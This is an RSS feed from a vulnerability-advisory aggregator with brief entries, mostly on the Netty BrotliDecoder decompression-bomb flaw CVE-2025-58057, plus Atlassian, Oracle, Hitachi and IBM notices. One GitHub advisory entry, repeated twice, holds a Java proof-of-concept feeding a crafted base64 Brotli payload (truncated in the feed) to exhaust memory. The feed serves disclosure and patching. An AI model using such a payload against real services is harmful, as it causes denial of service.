<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 02:28:05 +0000</lastBuildDate>
    <item>
      <title>bdu:2025-12594</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2025-12594</link>
      <description>bdu:2025-12594</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2025-12594</guid>
    </item>
    <item>
      <title>certfr-2025-avi-0903 — De multiples vulnérabilités ont été découvertes dans les produits Atlassian. Certaines d'entre elles permettent à un at…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2025-avi-0903</link>
      <description>certfr-2025-avi-0903</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2025-avi-0903</guid>
    </item>
    <item>
      <title>Withdrawn: CLEANSTART-2026-BL34124 — Security fixes in strimzi-kafka-operator 0.46.1-r4</title>
      <link>https://cve.radiocsirt.org/vuln/cleanstart-2026-bl34124</link>
      <description>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: strimzi-kafka-operator&lt;/p&gt;
&lt;p&gt;Package strimzi-kafka-operator version 0.46.1-r4 fixes 1 vulnerabilities: CVE-2025-58057&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; CleanStart: strimzi-kafka-operator&lt;/p&gt;
&lt;p&gt;Package strimzi-kafka-operator version 0.46.1-r4 fixes 1 vulnerabilities: CVE-2025-58057&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cleanstart-2026-bl34124</guid>
    </item>
    <item>
      <title>EUVD-2026-252003</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-252003</link>
      <description>EUVD-2026-252003</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-252003</guid>
    </item>
    <item>
      <title>fkie_cve-2025-58057</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-58057</link>
      <description>&lt;p&gt;Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers &amp;amp; clients. In netty-codec-compression versions 4.1.124.Final and below, and netty-codec versions 4.2.4.Final and below, when supplied with specially crafted input, BrotliDecoder and certain other decompression decoders will allocate a large number of reachable byte buffers, which can lead to denial of service. BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is fixed in versions 4.1.125.Final of netty-codec and 4.2.5.Final of netty-codec-compression.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers &amp;amp; clients. In netty-codec-compression versions 4.1.124.Final and below, and netty-codec versions 4.2.4.Final and below, when supplied with specially crafted input, BrotliDecoder and certain other decompression decoders will allocate a large number of reachable byte buffers, which can lead to denial of service. BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is fixed in versions 4.1.125.Final of netty-codec and 4.2.5.Final of netty-codec-compression.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-58057</guid>
    </item>
    <item>
      <title>GHSA-3p8m-j85q-pgmj — Netty's decoders vulnerable to DoS via zip bomb style attack</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-3p8m-j85q-pgmj</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: io.netty:netty-codec-compression, Maven: io.netty:netty-codec&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;With specially crafted input, `BrotliDecoder` and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;`BrotliDecoder.decompress` has no limit in how often it calls `pull`, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.&lt;/p&gt;
&lt;p&gt;Tested on 4.1.118, but there were no changes to the decoder since.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Run this test case with `-Xmx1G`:&lt;/p&gt;
&lt;p&gt;```java
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;&lt;/p&gt;
&lt;p&gt;import java.util.Base64;&lt;/p&gt;
&lt;p&gt;public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode(&amp;#34;aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oE…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: io.netty:netty-codec-compression, Maven: io.netty:netty-codec&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;With specially crafted input, `BrotliDecoder` and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;`BrotliDecoder.decompress` has no limit in how often it calls `pull`, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.&lt;/p&gt;
&lt;p&gt;Tested on 4.1.118, but there were no changes to the decoder since.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;Run this test case with `-Xmx1G`:&lt;/p&gt;
&lt;p&gt;```java
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;&lt;/p&gt;
&lt;p&gt;import java.util.Base64;&lt;/p&gt;
&lt;p&gt;public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode(&amp;#34;aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oE…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-3p8m-j85q-pgmj</guid>
    </item>
    <item>
      <title>jvndb-2026-020740</title>
      <link>https://cve.radiocsirt.org/vuln/jvndb-2026-020740</link>
      <description>&lt;p&gt;Hitachi Infrastructure Analytics Advisor contains the following vulnerability:&#13;
&#13;
CVE-2025-48924&#13;
&#13;
Hitachi Ops Center Analyzer contains the following vulnerabilities:&#13;
&#13;
CVE-2025-48924&#13;
&#13;
Hitachi Ops Center Analyzer viewpoint contains the following vulnerability:&#13;
&#13;
CVE-2025-48924&#13;
&#13;
Hitachi Ops Center Viewpoint contains the following vulnerabilities:&#13;
&#13;
CVE-2023-35116, CVE-2025-24970, CVE-2025-25193, CVE-2025-48924, CVE-2025-55163, CVE-2025-58056, CVE-2025-58057&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Hitachi Infrastructure Analytics Advisor contains the following vulnerability:&#13;
&#13;
CVE-2025-48924&#13;
&#13;
Hitachi Ops Center Analyzer contains the following vulnerabilities:&#13;
&#13;
CVE-2025-48924&#13;
&#13;
Hitachi Ops Center Analyzer viewpoint contains the following vulnerability:&#13;
&#13;
CVE-2025-48924&#13;
&#13;
Hitachi Ops Center Viewpoint contains the following vulnerabilities:&#13;
&#13;
CVE-2023-35116, CVE-2025-24970, CVE-2025-25193, CVE-2025-48924, CVE-2025-55163, CVE-2025-58056, CVE-2025-58057&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/jvndb-2026-020740</guid>
    </item>
    <item>
      <title>NCSC-2026-0022 — Kwetsbaarheden verholpen in Oracle Communications producten</title>
      <link>https://cve.radiocsirt.org/vuln/ncsc-2026-0022</link>
      <description>NCSC-2026-0022</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ncsc-2026-0022</guid>
    </item>
    <item>
      <title>openSUSE-SU-2025:15520-1 — netty-4.1.126-1.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2025:15520-1</link>
      <description>&lt;p&gt;netty-4.1.126-1.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;netty-4.1.126-1.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2025:15520-1</guid>
    </item>
    <item>
      <title>RHSA-2025:17187 — Red Hat Security Advisory: Red Hat build of Quarkus 3.15.7 release and security update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2025:17187</link>
      <description>&lt;p&gt;netty-codec-http: Netty is vulnerable to request smuggling due to incorrect parsing of chunk extensions netty-codec: netty-codec-compression: Netty&amp;#39;s BrotliDecoder is vulnerable to DoS via zip bomb style attack&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;netty-codec-http: Netty is vulnerable to request smuggling due to incorrect parsing of chunk extensions netty-codec: netty-codec-compression: Netty&amp;#39;s BrotliDecoder is vulnerable to DoS via zip bomb style attack&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2025:17187</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2025-58057</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-58057</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: netty, Ubuntu:Pro:16.04:LTS: netty, Ubuntu:Pro:18.04:LTS: netty, Ubuntu:Pro:20.04:LTS: netty, Ubuntu:22.04:LTS: netty, Ubuntu:24.04:LTS: netty, Ubuntu:25.10: netty&lt;/p&gt;
&lt;p&gt;Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers &amp;amp; clients. In netty-codec-compression versions 4.1.124.Final and below, and netty-codec versions 4.2.4.Final and below, when supplied with specially crafted input, BrotliDecoder and certain other decompression decoders will allocate a large number of reachable byte buffers, which can lead to denial of service. BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is fixed in versions 4.1.125.Final of netty-codec and 4.2.5.Final of netty-codec-compression.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: netty, Ubuntu:Pro:16.04:LTS: netty, Ubuntu:Pro:18.04:LTS: netty, Ubuntu:Pro:20.04:LTS: netty, Ubuntu:22.04:LTS: netty, Ubuntu:24.04:LTS: netty, Ubuntu:25.10: netty&lt;/p&gt;
&lt;p&gt;Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers &amp;amp; clients. In netty-codec-compression versions 4.1.124.Final and below, and netty-codec versions 4.2.4.Final and below, when supplied with specially crafted input, BrotliDecoder and certain other decompression decoders will allocate a large number of reachable byte buffers, which can lead to denial of service. BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is fixed in versions 4.1.125.Final of netty-codec and 4.2.5.Final of netty-codec-compression.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-58057</guid>
    </item>
    <item>
      <title>WID-SEC-W-2025-2098 — IBM SPSS: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2025-2098</link>
      <description>&lt;p&gt;Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM SPSS ausnutzen, um einen Denial of Service Angriff durchzuführen, und um Sicherheitsvorkehrungen zu umgehen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM SPSS ausnutzen, um einen Denial of Service Angriff durchzuführen, und um Sicherheitsvorkehrungen zu umgehen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2025-2098</guid>
    </item>
  </channel>
</rss>
